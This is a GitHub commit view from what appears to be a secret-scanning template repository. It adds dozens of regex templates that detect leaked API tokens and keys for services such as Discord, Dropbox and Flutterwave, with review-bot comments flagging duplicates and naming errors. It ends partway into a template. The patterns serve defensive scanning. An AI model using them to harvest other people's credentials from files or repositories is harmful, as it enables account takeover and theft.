Merge branch 'main' into jarm-c2-detect

patch-1
pussycat0x 2023-07-18 13:19:58 +05:30 committed by GitHub
commit 5182daf53b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2067 changed files with 18626 additions and 9621 deletions


@ -25,5 +25,5 @@ jobs:
- name: Template Validation
run: |
cp -r ${{ github.workspace }} $HOME
nuclei -duc -validate
nuclei -duc -validate -w ./workflows
nuclei -duc -validate -allow-local-file-access
nuclei -duc -validate -w ./workflows -allow-local-file-access
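Review bot: The `-allow-local-file-access` flag on the two validate commands has no comment saying why validation needs it, and it appears to be the only change in this step (the old and new sides are not marked on this page, so that is inferred). A later reader cannot tell whether the relaxation is deliberate or left over from debugging. A comment above the `run:` key would record the intent, for example `# validation needs local file access for templates that reference local payload files`, reworded to the actual reason.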


@ -1,3 +1,94 @@
file/keys/beamer-api-token.yaml
file/keys/bitbucket/bitbucket-client-id.yaml
file/keys/bitbucket/bitbucket-client-secret.yaml
file/keys/bittrex/bittrex-access-key.yaml
file/keys/bittrex/bittrex-secret-key.yaml
file/keys/clojars-api-token.yaml
file/keys/codecov-access-token.yaml
file/keys/coinbase-access-token.yaml
file/keys/confluent/confluent-access-token.yaml
file/keys/confluent/confluent-secret-token.yaml
file/keys/contentful-api-token.yaml
file/keys/databricks-api-token.yaml
file/keys/datadog-access-token.yaml
file/keys/discord/discord-api-token.yaml
file/keys/discord/discord-cilent-secret.yaml
file/keys/discord/discord-client-id.yaml
file/keys/doppler-api-token.yaml
file/keys/droneci-access-token.yaml
file/keys/dropbox/dropbox-api-token.yaml
file/keys/dropbox/dropbox-longlived-token.yaml
file/keys/dropbox/dropbox-shortlived-token.yaml
file/keys/duffel-api-token.yaml
file/keys/easypost/easypost-api-token.yaml
file/keys/easypost/easypost-test-token.yaml
file/keys/etsy-access-token.yaml
file/keys/facebook/facebook-api-token.yaml
file/keys/fastly-api-token.yaml
file/keys/finicity/finicity-api-token.yaml
file/keys/finicity/finicity-client-secret.yaml
file/keys/finnhub-access-token.yaml
file/keys/flickr-access-token.yaml
file/keys/flutter/flutterwave-encryption-key.yaml
file/keys/flutter/flutterwave-public-key.yaml
file/keys/flutter/flutterwave-secret-key.yaml
file/keys/frameio-api-token.yaml
file/keys/freshbooks-access-token.yaml
file/keys/gitter-access-token.yaml
file/keys/gocardless-api-token.yaml
file/keys/grafana/grafana-api-key.yaml
file/keys/grafana/grafana-cloud-api-token.yaml
file/keys/grafana/grafana-service-account-token.yaml
file/keys/hashicorp-api-token.yaml
file/keys/zendesk-secret-key.yaml
http/cves/2017/CVE-2017-7925.yaml
http/cves/2023/CVE-2023-28665.yaml
http/cves/2023/CVE-2023-3345.yaml
http/cves/2023/CVE-2023-3460.yaml
http/cves/2023/CVE-2023-37270.yaml
miscellaneous/spnego.yaml
http/default-logins/yealink/yealink-default-login.yaml
http/exposed-panels/anaqua-login-panel.yaml
http/exposures/tokens/beamer/beamer-token.yaml
http/exposures/tokens/bitbucket/bitbucket-clientid.yaml
http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml
http/exposures/tokens/bittrex/bittrex-accesskey.yaml
http/exposures/tokens/bittrex/bittrex-secretkey.yaml
http/exposures/tokens/clojars/clojars-token.yaml
http/exposures/tokens/codecov/codecov-accesstoken.yaml
http/exposures/tokens/coinbase/coinbase-accesstoken.yaml
http/exposures/tokens/confluent/confluent-accesstoken.yaml
http/exposures/tokens/confluent/confluent-secretkey.yaml
http/exposures/tokens/contentful/contentful-token.yaml
http/exposures/tokens/databricks/databricks-token.yaml
http/exposures/tokens/datadog/datadog-accesstoken.yaml
http/exposures/tokens/discord/discord-clientid.yaml
http/exposures/tokens/discord/discord-clientsecret.yaml
http/exposures/tokens/discord/discord-token.yaml
http/exposures/tokens/doppler/doppler-token.yaml
http/exposures/tokens/droneci/droneci-accesstoken.yaml
http/exposures/tokens/dropbox/dropbox-long-token.yaml
http/exposures/tokens/dropbox/dropbox-short-token.yaml
http/exposures/tokens/dropbox/dropbox-token.yaml
http/exposures/tokens/duffel/duffel-token.yaml
http/exposures/tokens/easypost/easypost-testtoken.yaml
http/exposures/tokens/easypost/easypost-token.yaml
http/exposures/tokens/etsy/etsy-accesstoken.yaml
http/exposures/tokens/facebook/facebook-token.yaml
http/exposures/tokens/fastly/fastly-token.yaml
http/exposures/tokens/finicity/finicity-clientsecret.yaml
http/exposures/tokens/finicity/finicity-token.yaml
http/exposures/tokens/finnhub/finnhub-accesstoken.yaml
http/exposures/tokens/flickr/flickr-accesstoken.yaml
http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml
http/exposures/tokens/flutter/flutterwave-publickey.yaml
http/exposures/tokens/flutter/flutterwave-secretkey.yaml
http/exposures/tokens/frameio/frameio-token.yaml
http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml
http/exposures/tokens/gitter/gitter-token.yaml
http/exposures/tokens/gocardless/gocardless-token.yaml
http/exposures/tokens/grafana/grafana-cloud-token.yaml
http/exposures/tokens/grafana/grafana-key.yaml
http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml
http/exposures/tokens/hashicorp/hashicorp-token.yaml
http/exposures/tokens/zendesk/zendesk-key.yaml
http/miscellaneous/spnego.yaml


@ -0,0 +1,22 @@
id: beamer-api-token
info:
name: Beamer API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go
metadata:
verified: true
tags: beamer,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: bitbucket-client-id
info:
name: BitBucket Client ID
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go
metadata:
verified: true
tags: bitbucket,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: bitbucket-client-secret
info:
name: BitBucket Client Secret
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go
metadata:
verified: true
tags: bitbucket,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: bittrex-access-key
info:
name: Bittrex Access Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go
metadata:
verified: true
tags: bittrex,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
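Review bot: The extractor regex in this template is identical to the one in the `bittrex-secret-key` template added in the same commit: same `bittrex` keyword window, same `([a-z0-9]{32})` capture. Every match will therefore be reported twice, once under each id, and neither finding can say whether the string is an access key or a secret key. Either keep one template that covers both, or state the limitation in `info`, for example `description: Matches a 32-character Bittrex credential; access and secret keys are not distinguished.`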


@ -0,0 +1,22 @@
id: bittrex-secret-key
info:
name: Bittrex Secret Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go
metadata:
verified: true
tags: bittrex,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: clojars-api-token
info:
name: Clojars API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go
metadata:
verified: true
tags: clojars,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(CLOJARS_)[a-z0-9]{60}


@ -0,0 +1,22 @@
id: codecov-access-token
info:
name: Codecov Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go
metadata:
verified: true
tags: codecov,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: coinbase-access-token
info:
name: Coinbase Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go
metadata:
verified: true
tags: coinbase,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: confluent-access-token
info:
name: Confluent Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go
metadata:
verified: true
tags: confluent,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: confluent-secret-token
info:
name: Confluent Secret Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go
metadata:
verified: true
tags: confluent,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: contentful-api-token
info:
name: Contentful Delivery API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go
metadata:
verified: true
tags: contentful,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: databricks-api-token
info:
name: Databricks API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go
metadata:
verified: true
tags: databricks,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: datadog-access-token
info:
name: Datadog Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go
metadata:
verified: true
tags: datadog,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: discord-api-token
info:
name: Discord API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go
metadata:
verified: true
tags: discord,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: discord-client-secret
info:
name: Discord Client Secret
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go
metadata:
verified: true
tags: discord,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
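Review bot: The template id here is `discord-client-secret`, but the additions list earlier in this commit records a path `file/keys/discord/discord-cilent-secret.yaml`, with "cilent" misspelled. This section does not show its own path, so the link between the two is inferred. If that path is this file, anyone selecting or excluding the template by filename will miss it. Renaming the file to `discord-client-secret.yaml` and regenerating the additions list would bring the path and id into agreement.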


@ -0,0 +1,22 @@
id: discord-client-id
info:
name: Discord Client ID
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go
metadata:
verified: true
tags: discord,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: doppler-api-token
info:
name: Doppler API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go
metadata:
verified: true
tags: doppler,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (dp\.pt\.)(?i)[a-z0-9]{43}


@ -0,0 +1,22 @@
id: droneci-access-token
info:
name: Droneci Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go
metadata:
verified: true
tags: droneci,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: dropbox-api-token
info:
name: Dropbox API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go
metadata:
verified: true
tags: dropbox,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: dropbox-longlived-token
info:
name: Dropbox Long Lived API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go
metadata:
verified: true
tags: dropbox,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: dropbox-shortlived-token
info:
name: Dropbox Short Lived API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go
metadata:
verified: true
tags: dropbox,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: duffel-api-token
info:
name: Duffel API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go
metadata:
verified: true
tags: duffel,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- duffel_(test|live)_(?i)[a-z0-9_\-=]{43}


@ -0,0 +1,22 @@
id: easypost-api-token
info:
name: Easypost Test API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml
metadata:
verified: true
tags: easypost,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- EZAK(?i)[a-z0-9]{54}
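Review bot: The `name` field says "Easypost Test API Token", but the id is `easypost-api-token` and the regex matches the `EZAK` prefix, not the `EZTK` prefix used by the separate `easypost-test-token` template. The name looks copied from that sibling. As written, a finding for a non-test key is labelled as a test token in scan output, which invites triage to treat it as lower priority. Change the line to `name: Easypost API Token`.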


@ -0,0 +1,22 @@
id: easypost-test-token
info:
name: Easypost Test API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml
metadata:
verified: true
tags: easypost,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- EZTK(?i)[a-z0-9]{54}


@ -0,0 +1,22 @@
id: etsy-access-token
info:
name: Etsy Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go
metadata:
verified: true
tags: etsy,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: facebook-api-token
info:
name: Facebook API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go
metadata:
verified: true
tags: facebook,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: fastly-api-token
info:
name: Fastly API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go
metadata:
verified: true
tags: fastly,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: finicity-api-token
info:
name: Finicity API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go
metadata:
verified: true
tags: finicity,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: finicity-client-secret
info:
name: Finicity Client Secret
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go
metadata:
verified: true
tags: finicity,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: finnhub-access-token
info:
name: Finnhub Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go
metadata:
verified: true
tags: finnhub,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: flickr-access-token
info:
name: Flickr Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go
metadata:
verified: true
tags: flickr,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
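Review bot: The `tags` line here is `flickr,file,keys`, while the earlier token templates in this commit, from beamer through finnhub, all use `file,token`. The frameio, freshbooks, gitter, gocardless and hashicorp templates are also named as tokens but tagged `keys`. A scan that selects these detections by the `token` tag will silently skip them. Unless the split is intended, use `tags: flickr,file,token` here and make the same change in the other five.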


@ -0,0 +1,22 @@
id: flutterwave-encryption-key
info:
name: Flutterwave Encryption Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go
metadata:
verified: true
tags: flutter,file,keys,flutterwave
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- FLWSECK_TEST-(?i)[a-h0-9]{12}
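Review bot: The pattern `FLWSECK_TEST-(?i)[a-h0-9]{12}` has no trailing boundary and is a strict prefix of the `flutterwave-secret-key` pattern `FLWSECK_TEST-(?i)[a-h0-9]{32}-X`. Every secret key will therefore also be reported as an encryption key, truncated to 12 characters. Ending the pattern with a boundary, `FLWSECK_TEST-(?i)[a-h0-9]{12}\b`, stops it matching inside the longer value. The three Flutterwave templates also share two things worth confirming against the upstream rule: the class `[a-h0-9]` is wider than hex, and only the `_TEST` prefixes are matched, so non-test keys would not be reported.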


@ -0,0 +1,22 @@
id: flutterwave-public-key
info:
name: Flutterwave Public Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml
metadata:
verified: true
tags: flutter,file,keys,flutterwave
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- FLWPUBK_TEST-(?i)[a-h0-9]{32}-X


@ -0,0 +1,22 @@
id: flutterwave-secret-key
info:
name: Flutterwave Secret Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go
metadata:
verified: true
tags: flutter,file,keys,flutterwave
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- FLWSECK_TEST-(?i)[a-h0-9]{32}-X


@ -0,0 +1,22 @@
id: frameio-api-token
info:
name: Frameio API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go
metadata:
verified: true
tags: frameio,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- fio-u-(?i)[a-z0-9\-_=]{64}


@ -0,0 +1,22 @@
id: freshbooks-access-token
info:
name: Freshbooks Access Token
